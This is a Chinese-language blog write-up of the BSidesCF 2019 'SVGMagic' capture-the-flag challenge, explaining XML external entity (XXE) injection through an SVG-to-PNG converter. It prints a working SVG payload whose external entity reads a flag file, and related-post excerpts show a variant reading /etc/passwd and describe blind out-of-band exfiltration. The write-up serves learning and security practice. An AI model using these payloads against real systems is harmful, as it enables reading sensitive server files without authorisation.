[BSidesCF 2019]SVGMagic

最新推荐文章于 2024-04-15 09:48:34 发布
最新推荐文章于 2024-04-15 09:48:34 发布
阅读量895 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全 xxe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/124052707
版权
本文深入探讨了SVG到PNG转换过程中可能存在的XML外部实体注入(XEE)漏洞。SVG作为一种基于XML的图形语言,其可控内容可能导致XXE攻击。当应用程序在解析XML输入时不阻止外部实体加载时,攻击者可以利用此漏洞读取敏感文件。例如,通过在SVG中定义外部实体引用文件系统路径,攻击者能够将文件内容暴露出来。了解并防止这种攻击对于保障系统安全至关重要。
摘要由CSDN通过智能技术生成 
知识点:XML外部实体注入(XEE)

标题说把SVG转为PNG
在这里插入图片描述
SVG是一种用XML定义的语言,SVG图形是可交互的和动态的,可以在SVG文件中嵌入动画元素或通过脚本来定义动画。

也就是说这里的SVG是个XML,并且存在可控的内容,那么自然就会想到XXE。

究极详细讲解:https://www.freebuf.com/vuls/175451.html

我的理解是:

首先我们要知道,XML 被设计用来传输和存储数据。
然后这个漏洞就是利用了,应用程序在解析XML输入时,没有禁止外部实体的加载。
就拿下面的这个来说<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >,这个就是外部实体,加载了flag.txt,然后输出,
也就是:应该是实体引用,把加载的东西放出来
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" >
]>
<svg height="100" width="1000">
  <text x="10" y="20">&file;</text>
</svg>

在这里插入图片描述

succ3
关注
专栏目录
buu-[BSidesCF 2019]SVGMagic
qaq517384的博客
10-25 301
打开环境是一个svg转png的 参考合天的浅谈SVG的两个黑魔法 由SVG造成的XXE注入 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///etc/passwd" > ]> <svg height="200" width="1000"> <text x="10" y="20">&file;</text&g
BUUCTF__web题解合集(十二)
风过江南乱的博客
10-14 881
1、[BSidesCF 2019]Kookie 2、[CISCN2019 华北赛区 Day1 Web5]CyberPunk 3、[RCTF2015]EasySQL 4、[Zer0pts2020]Can you guess it? 5、[HITCON 2017]SSRFme
SVGMagic.V1.004.zip
08-27
一个好用的DELPHI SVG库。 SVG全名是可缩放矢量图形(英语:Scalable Vector Graphics,SVG),是一种基于可扩展标记语言(XML),用于描述二维矢量图形的图形格式。 SVG格式具有以下优点: * 图像文件可读,易于修改和编辑(理论上如此,但实际上却是因为各种不同的SVG档编辑器而可能存储成不易解读的SVG文件) * 与现有技术可以互动融合。例如,SVG技术本身的动态部分(包括时序控制和动画)就是基于SMIL标准。另外,SVG文件还可嵌入JavaScript(严格地说,应该是ECMAScript)脚本来控制SVG对象 * SVG图形格式可以方便的创建文字索引,从而实现基于内容的图像搜索 * SVG图形格式支持多种滤镜和特殊效果,在不改变图像内容的前提下可以实现位图格式中类似文字阴影的效果。 * SVG图形格式可以用来动态生成图形。例如,可用SVG动态生成具有交互功能的地图,嵌入网页中,并显示给终端用户。 SVG格式具有以下缺点: * 如何和已经占有重要市场份额的矢量图形格式Adobe Animate竞争的问题。事实上,Adobe Animate在Flash CC 2014版及以后的版本就都支持直接导出SVG文件了。 * SVG的本地运行环境下的厂家支持程度。 * 由于原始的SVG档是遵从XML语法,导致数据采用未压缩的方式存放,因此相较于其他的矢量图形格式,同样的文件内容会比其他的文件格式稍大。Adobe因此使用gzip压缩开发出压缩的SVG档格式,附文件名为 .svgz, 但此种文件格式除了Adobe旗下的软件以外,未被广泛支持使用。 * 旧版的SVG Viewer无法正确显示出使用新版SVG格式的矢量图形。
BUUCTF--[BSidesCF 2019]SVGMagic
qq_46263951的博客
07-22 1091
进去后是一个这样的页面 这里大标题给出提示使用 MagicSVG 转换为 PNG 那啥是SVG呢,先来了解一下 这里SVG是个XML的图片,并且存在可控的内容 这里可以尝试一下XEE漏洞的这种情况 由于不知道flag的路径,所以先用/proc/self/pwd/代表的是当前路径。可以构造/proc/self/pwd/flag.txt读取文件. 最终构造.svg文件内容为 <?xml version="1.0" encoding="UTF-8"?> <!D..
BUUCTF__web题解合集(十)
风过江南乱的博客
09-27 1805
1、[CISCN2019 华东南赛区]Web11 2、[BJDCTF 2nd]Schrödinger 3、[BJDCTF 2nd]duangShell 4、[BSidesCF 2019]Futurella 5、[网鼎杯 2018]Comment
Buuctf RSA 详细题解
偷一个月亮
08-31 3951
import Crypto import binascii from Crypto.PublicKey import RSA from Crypto.Util.number import long_to_bytes,bytes_to_long import gmpy2 import rsa r=open('pub.key').read() pub=RSA.importKey(r) n=pub.n e=pub.e print n print e p = 28596046889045163793562944.
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 274
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 668
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
SVGMagic V1.001.7z
07-10
SVGMagic V1.001.7z
SVGMagic-master
06-13
SVGMagic-master 是一个前端控制svg图片缩放的jquery插件。
SVGMagic:通过即时动态创建PNG版本来回退SVG图像
02-25
SVGMagic-跨浏览器SVG 该存储库不再处于主动维护状态。 事实证明,2013年它非常有用,但是如今,都支持SVG。 该插件将继续工作,但不会保证API的可用性。 这是一个很棒的旅程! 这个易于使用的jQuery插件将为您网站上的.SVG图片创建后备。 当插件注意到访问者浏览器不支持.SVG图像时,它将用新的.PNG图像替换这些图像。 这些.PNG图像是使用服务器端脚本在运行时创建的。 当访问者浏览器确实支持.SVG图像时,它将回到睡眠状态。 SVGMagic的一大优点是您不必创建图像的多个版本。 您可以只关注.SVG图像,然后让SVGMagic完成其余的工作。 您可以在上找到更多信息和演示。 SVG ...什么/为什么? SVG是矢量图形格式,这意味着它具有完美的可伸缩性。 无论需要显示什么尺寸,或需要显示什么屏幕,SVG都能完美适应。 这意味着您可以为桌面和移动(包括R
delphi SVG组件库
06-17
delphi SVG组件库,用于Delphi 显示SVG格式矢量图,同时支持Vcl和FMX,全源码(delphi XE2以上版本),本人在delphi10.3.2下使用。
[BSidesCF 2019]SVGMagicXXE
qq_62046696的博客
12-28 1048
原理:有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器。最后发包,%remote先调用,vps上的 dtd文件,然后%int调用读取文件,最后send把读取后的发送到远程vps上,样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。普通的xml二者对比,改变不多也就是
[BSidesCF 2019]SVGMagic XXESVG注入
qq_54929891的博客
05-13 840
进入题目可以看到叫我们利用魔法将SVG转为PNG,查资料了解一下SVG是个啥东西XML的SVG知识总结_叨唠的博客-CSDN博客_svg xml 是一个图片,既然是XML里面的图片标签,那么则可以往XXE注入里面想想,但是SVG不知道怎么构造浅谈SVG的两个黑魔法 - 知乎 我们可以利用text标签来显现文字,将文字改为引用我们的恶意代码即可 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test [ &lt...
推荐项目:SVGMagic - 图像处理的新魔力
最新发布
gitblog_00060的博客
04-15 386
推荐项目:SVGMagic - 图像处理的新魔力 SVGMagicFallback for SVG images by automatically creating PNG versions on-the-fly项目地址:https://gitcode.com/gh_mirrors/sv/SVGMagic 项目简介 是一个强大的SVG图像处理库,专为JavaScript和Node.js环境设计。...
[BSidesSF 2019]SVGMagic svg->png结合xxe任意文件去读
a3320315的博客
02-15 1971
payload <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY file SYSTEM "file:///proc/self/cwd/flag.txt" > ]> <svg height="100" width="1000"> <text x="10" y="...
Graphics Magic图像处理魔术师,含Delphi控件
fangyuan621的专栏
01-12 408
Graphics Magic图像处理魔术师,含Delphi控件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值